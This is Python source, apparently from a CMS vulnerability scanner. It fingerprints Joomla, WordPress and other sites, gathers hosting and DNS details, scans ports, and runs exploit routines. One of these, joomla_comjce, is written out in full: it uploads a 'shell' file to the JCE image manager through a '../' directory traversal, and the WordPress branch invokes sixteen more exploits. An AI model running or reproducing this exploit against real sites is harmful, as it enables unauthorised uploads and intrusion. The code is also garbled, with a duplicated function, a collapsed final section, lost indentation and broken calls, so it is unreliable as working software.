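def webhosting_info(hostinfo):
    """Print domain-age and IP geolocation details for the module-level ``url``.

    The lookups go to two third-party services, so the target's hostname and
    resolved address are disclosed to them: the payapi.io domain-age endpoint
    and ipinfo.io. Both responses are scraped with regular expressions, and a
    field is printed only when its pattern matches.

    Args:
        hostinfo: Accepted for call compatibility; not read by this function.

    Raises:
        socket.gaierror: If the hostname cannot be resolved.
    """
    print(' %s Web Hosting Information' % (run))
    host = hostd(url)

    age_page = vxget(
        "https://input.payapi.io/v1/api/fraud/domain/age/" + host,
        headers, timeout)
    # Only group(1) is used; the trailing lazy group just anchors on the
    # first '-' after the captured text.
    created = re.search(r'Date: (.+?)-(.+?)', age_page)
    if created:
        print(' %s Domain Created on : %s' % (good, created.group(1)))

    # This is whatever address the name resolves to; nothing here checks
    # that it belongs to Cloudflare, despite the label.
    ip = socket.gethostbyname(host)
    print(' %s CloudFlare IP : %s' % (good, ip))

    # Query ipinfo.io over HTTPS so the lookup (and the address being
    # investigated) is not sent in clear text.
    geo_page = vxget("https://ipinfo.io/" + ip + "/json", headers, timeout)

    # (label, pattern) pairs, printed in this order.
    # NOTE(review): the latitude pattern has no quoted-key shape and ends in
    # a lazy group, so it can capture at most one character -- confirm the
    # intended key. 'ans' is presumably meant to be 'asn' -- confirm.
    fields = (
        ('Country', r'country\": \"(.+?)\"'),
        ('Region', r'region\": \"(.+?)\"'),
        ('Latitude', r'latitude: (.+?)'),
        ('Longitude', r'longitude\": \"(.+?)\"'),
        ('Timezone', r'timezone\": \"(.+?)\"'),
        ('Ans', r'ans\": \"(.+?)\"'),
        ('Org', r'org\": \"(.+?)\"'),
    )
    for label, pattern in fields:
        hit = re.search(pattern, geo_page)
        if hit:
            print(' %s %s : %s' % (good, label, hit.group(1)))
    print("-----------------------------------------------")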
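def dnsdumper(url):
    """Look up DNS records for ``url``'s host through dnsdumpster.com and print them.

    The function loads the dnsdumpster landing page, extracts the form's CSRF
    token, submits the domain, and parses the first four HTML tables of the
    result page into DNS, MX, TXT and host records. Only the DNS-server and
    MX tables are printed. The target domain is disclosed to dnsdumpster.com.

    Args:
        url: Target URL; its host part is obtained with ``hostd``.

    Returns:
        None. When the token or the expected tables are missing, a message is
        printed and the function returns early.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    # Bound every request so an unresponsive service cannot hang the run.
    request_timeout = 15

    # One session for both requests, closed when the block exits.
    with requests.Session() as session:
        landing = session.get(dnsdumpster_url, timeout=request_timeout).text
        token_match = re.search(
            r"name='csrfmiddlewaretoken' value='(.*?)'", landing)
        if token_match is None:
            # The page layout changed or the request was blocked; without
            # the token the form submission cannot succeed.
            print(' %s No CSRF token found on %s' % (que, dnsdumpster_url))
            return
        csrf_token = token_match.group(1)
        print(' %s Retrieved token: %s' % (que, csrf_token))

        cookies = {'csrftoken': csrf_token}
        headers = {'Referer': 'https://dnsdumpster.com/'}
        data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
        response = session.post(
            dnsdumpster_url, cookies=cookies, data=data, headers=headers,
            timeout=request_timeout)

    # The original also downloaded the static map image for the domain but
    # never used the result; that request is dropped.
    if response.status_code == 200:
        soup = BeautifulSoup(response.content, 'html.parser')
        tables = soup.findAll('table')
        if len(tables) < 4:
            # Fewer tables than the four indexed below: treat the page as
            # unusable instead of failing on an index error.
            print(' %s Unexpected dnsdumpster response for %s' % (que, domain))
            return
        res = {
            'domain': domain,
            'dns_records': {
                'dns': results(tables[0]),
                'mx': results(tables[1]),
                'txt': text_record(tables[2]),
                'host': results(tables[3]),
            },
        }
        print(' %s looking for dns-servers' % (que))
        print(res['dns_records']['dns'])
        print(' %s looking for mx-records' % (que))
        print(res['dns_records']['mx'])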
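def webhosting_info():
    """Print the domain creation date, resolved IP, country and region of ``url``.

    Reads the module-level ``url`` and ``headers``. The hostname is sent to
    the payapi.io domain-age endpoint and the resolved address to ipinfo.io,
    each with a fixed 3-second timeout passed to ``vxget``. Fields are printed
    only when their pattern matches the response text.

    Raises:
        socket.gaierror: If the hostname cannot be resolved.
    """
    print('%s [~] Web Hosting Information %s' % (Y, W))
    target_host = hostd(url)
    lookup_timeout = 3

    age_url = "https://input.payapi.io/v1/api/fraud/domain/age/" + target_host
    age_text = vxget(age_url, headers, lookup_timeout)
    date_hit = re.search(r'Date: (.+?)-(.+?)', age_text)
    if date_hit:
        print('%s [*] Domain Created on : %s' % (B, date_hit.group(1)))

    # The label says CloudFlare, but this is simply the address the name
    # resolves to; no provider check is made here.
    ip = socket.gethostbyname(target_host)
    print('%s [*] CloudFlare IP : %s' % (B, ip))

    # HTTPS keeps the queried address and the reply off the wire in clear text.
    geo_text = vxget("https://ipinfo.io/" + ip + "/json", headers, lookup_timeout)

    country = re.search(r'country\": \"(.+?)\"', geo_text)
    if country:
        print('%s [*] Country : %s' % (B, country.group(1)))
    region = re.search(r'region\": \"(.+?)\"', geo_text)
    if region:
        print('%s [*] Region : %s' % (B, region.group(1)))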
def joomla_comjce(url, headers, timeout):
    """Probe the Joomla JCE (com_jce) image-manager upload handler on ``url``.

    Posts a multipart-style form to the com_jce ``imgmanager`` endpoint with
    a local GIF, then requests ``/VulnX.gif`` from the site root and prints
    a success or failure line.

    What shows up on the target side, useful for detection: a POST to
    ``index.php`` with ``option=com_jce`` and ``plugin=imgmanager``, a form
    field ``upload-dir`` containing ``../`` segments, the fixed legacy
    User-Agent set below, and a follow-up GET for ``/VulnX.gif``.

    Args:
        url: Base URL of the site being checked.
        headers: Request headers; modified in place (User-Agent is replaced).
        timeout: Passed through to ``vxpost``.
    """
    # Resolved address is not used anywhere else in this function.
    ip = socket.gethostbyname(hostd(url))
    # Overwrites the caller's dict entry, so later requests that share this
    # dict carry the same User-Agent.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    data = {
        # Relative path with parent-directory segments: the upload is aimed
        # two levels above the handler's default directory.
        'upload-dir': './../../',
        'upload-overwrite': 0,
        # File handle is opened here and never closed in this function.
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload'
    }
    # Response body is stored but not inspected.
    content = vxpost(endpoint, data, headers, timeout)
    # Socket is connected and then neither used nor closed.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((url, 80))
    path_shell = url + "/VulnX.gif"
    res = requests.get(path_shell, headers)
    # Outcome is decided by a pattern search on the follow-up response.
    if re.findall(r'/image/gif/', res):
        print(' %s Com Jce %s %s' % (que, vulnexploit, path_shell))
    else:
        print(' %s Com Jce %s' % (que, failexploit))
def detect_cms():
    """Fingerprint the CMS behind the module-level ``url`` and run the enabled stages.

    Three pages are fetched up front with ``vxget``: ``/smiley/1.gif``,
    ``/rss.xml`` and the site root. The root body is then tested against
    substring patterns in a fixed order -- Joomla, WordPress, Drupal,
    Prestashop, OpenCart, Magento -- followed by two Lokomedia probes on the
    other two responses; the first match wins and anything else is reported
    as Unknown.

    Inside the matching branch the module-level flags decide what runs:
    ``webinfo`` (hosting lookup), ``domaininfo`` (subdomain lookup), ``cms``
    (version/theme/user/plugin grabbing), ``scanports`` (port scan) and
    ``exploit`` (the per-CMS check routines).

    The patterns are loose substring matches, so any page that merely
    mentions a product name is classified as that product and, with
    ``exploit`` set, receives that product's full set of check requests.
    In access logs the run is recognisable by the ``/smiley/1.gif`` and
    ``/rss.xml`` requests arriving immediately before the request for the
    site root.
    """
    # Target index shown in the banner; always 0 here. Shadows the builtin id().
    id = 0
    # Lokomedia probes are requested unconditionally, before any matching.
    lm = url + '/smiley/1.gif'
    lm_content = vxget(lm, headers)
    lm2 = url + '/rss.xml'
    lm2_content = vxget(lm2, headers)
    content = vxget(url, headers)

    # ---- Joomla ----
    # Matches the mootools script tag, the /media/system/js/ path,
    # 'com_content' or the literal 'Joomla!' anywhere in the root page.
    if re.search(
            re.compile(
                r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Joomla' % (good, W, end))
        print('------------------------------------------------')
        # Hosting information stage.
        if webinfo:
            webhosting_info(hostinfo)
        # Domain / subdomain stage.
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            # NOTE(review): the Joomla branch calls prestashop_version();
            # looks like a copy-paste slip -- confirm.
            prestashop_version()
        # Port scan stage.
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Joomla check routines, defined in ./common/joomla_exploits.py.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
            joomla_comjce(url, headers, timeout)
            joomla_comedia(url, headers, timeout)
            joomla_comjdownloads(url, headers, timeout)
            joomla_comjdownloads2(url, headers, timeout)
            joomla_fabrik2(url, headers, timeout)
            joomla_fabrik2_d(url, headers, timeout)
            joomla_foxcontact(url, headers, timeout)

    # ---- WordPress ----
    # The '.' in 'xmlrpc.php' is unescaped, so it matches any character.
    elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Wordpress' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        # Information grabbers, defined in ./common/grapwp.py; `cms` selects
        # one of them or, with 'all', every one in sequence.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'themes':
            print(' %s Check CMS Info' % (run))
            wp_themes(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'user':
            print(' %s Check CMS Info' % (run))
            wp_user(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'plugins':
            print(' %s Check CMS Info' % (run))
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'all':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            wp_themes(url, headers, grabinfo)
            wp_user(url, headers, grabinfo)
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        # Port scan stage.
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %sPORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Enabled from the command line with -e / --exploit.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
            # WordPress check routines, defined in ./common/wp_exploits.py.
            wp_wysija(url, headers, timeout, vulnresults)
            wp_blaze(url, headers, timeout, vulnresults)
            wp_synoptic(url, headers, timeout, vulnresults)
            wp_catpro(url, headers, timeout, vulnresults)
            wp_cherry(url, headers, timeout, vulnresults)
            wp_dm(url, headers, timeout, vulnresults)
            wp_fromcraft(url, headers, timeout, vulnresults)
            wp_jobmanager(url, headers, timeout, vulnresults)
            wp_showbiz(url, headers, timeout, vulnresults)
            wp_shop(url, headers, timeout, vulnresults)
            wp_powerzoomer(url, headers, timeout, vulnresults)
            wp_revslider(url, headers, timeout, vulnresults)
            wp_adsmanager(url, headers, timeout, vulnresults)
            wp_inboundiomarketing(url, headers, timeout, vulnresults)
            wp_adblockblocker(url, headers, timeout, vulnresults)
            wp_levoslideshow(url, headers, timeout, vulnresults)
            print("-----------------------------------------------")

    # ---- Drupal ----
    # 'drupal' alone already covers 'drupal.org'; the '.' there is unescaped.
    elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Drupal' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            drupal_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no check routine is called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- Prestashop ----
    elif re.search(re.compile(r'Prestashop|prestashop'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Prestashop' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            prestashop_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no check routine is called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- OpenCart ----
    elif re.search(
            re.compile(
                r'route=product|OpenCart|route=common|catalog/view/theme'),
            content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : OpenCart' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        # Prints the stage header only; no version routine is called.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no check routine is called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- Magento ----
    elif re.search(
            re.compile(
                r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Magento' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        # Prints the stage header only; no version routine is called.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no check routine is called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
        # NOTE(review): this line sat after the Lokomedia banner comment in
        # the collapsed listing and its indentation was lost; placed at
        # branch level here -- confirm against the original file.
        print(' %s Check Vulnerability' % (run))

    # ---- Lokomedia, probe 1: /smiley/1.gif response mentions image/gif ----
    elif re.search(re.compile(r'image/gif'), lm_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Runs regardless of the `domaininfo` flag, unlike the other branches.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # NOTE(review): indentation lost in the listing; assumed to be
        # unconditional -- confirm.
        print(' %s Check Vulnerability' % (run))

    # ---- Lokomedia, probe 2: /rss.xml response mentions 'lokomedia' ----
    elif re.search(re.compile(r'lokomedia'), lm2_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Runs regardless of the `domaininfo` flag, unlike the other branches.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # NOTE(review): indentation lost in the listing; assumed to be
        # unconditional -- confirm.
        print(' %s Check Vulnerability' % (run))

    # ---- Unknown: no pattern matched ----
    else:
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Unknown' % (bad))
        print('------------------------------------------------')
        # Hosting and domain lookups still run; no port scan or checks here.
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
signal.signal(signal.SIGINT, signal_handler) #main if __name__ == "__main__": if url: #url condition entrypoint root = url if root.startswith('http'): url = root else: url = 'http://' + root #default headers. headers = { 'Host': hostd(url), 'User-Agent': random_UserAgent(), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', } detect_cms() if dorks: headers = { 'host': 'google.com', 'User-Agent': random_UserAgent(), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive',